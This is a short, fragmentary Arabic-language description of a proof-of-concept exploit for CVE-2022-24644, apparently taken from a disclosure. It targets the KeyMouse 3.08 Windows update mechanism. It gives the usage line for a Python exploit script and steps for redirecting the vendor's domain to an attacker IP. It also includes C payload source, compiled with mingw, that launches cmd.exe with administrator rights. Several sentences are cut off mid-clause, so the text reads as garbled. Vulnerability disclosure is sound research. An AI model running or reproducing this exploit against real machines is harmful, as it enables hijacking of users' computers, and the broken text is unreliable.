
استغلال إثبات المفهوم لـ CVE-2022-24644، يوضح تنفيذ الأكواد عن بُعد غير المصادق عليه عبر التزوير في نظام أسماء النطاقات ضد آلية تحديث KeyMouse Windows 3.08.
ZZ Inc. KeyMouse 3.08 (ويندوز) ثغرة تنفيذ التعليمات البرمجية عن بُعد غير مصادق عليها عبر التحديث
الاستخدام: python3 cve-2022-24644_poc.py
التفاصيل في التقرير على gerr.re.
www.keymouse.com إلى عنوان IP الخاص بالمهاجم;
c:\windows\system32\drivers\etc\hosts على الهدف.
proof.c على المهاجم، مثلاً باستخدام i686-w64-mingw32-gcc proof.c -o proof.exe;#include <windows.h>
int main(int argc, char const *argv[]){
WinExec("cmd.exe",1);
return TRUE;
}
ونتيجة لذلك، يتم تنفيذ proof.exe في سياق مستخدم المسؤول بدرجة تكامل عالية.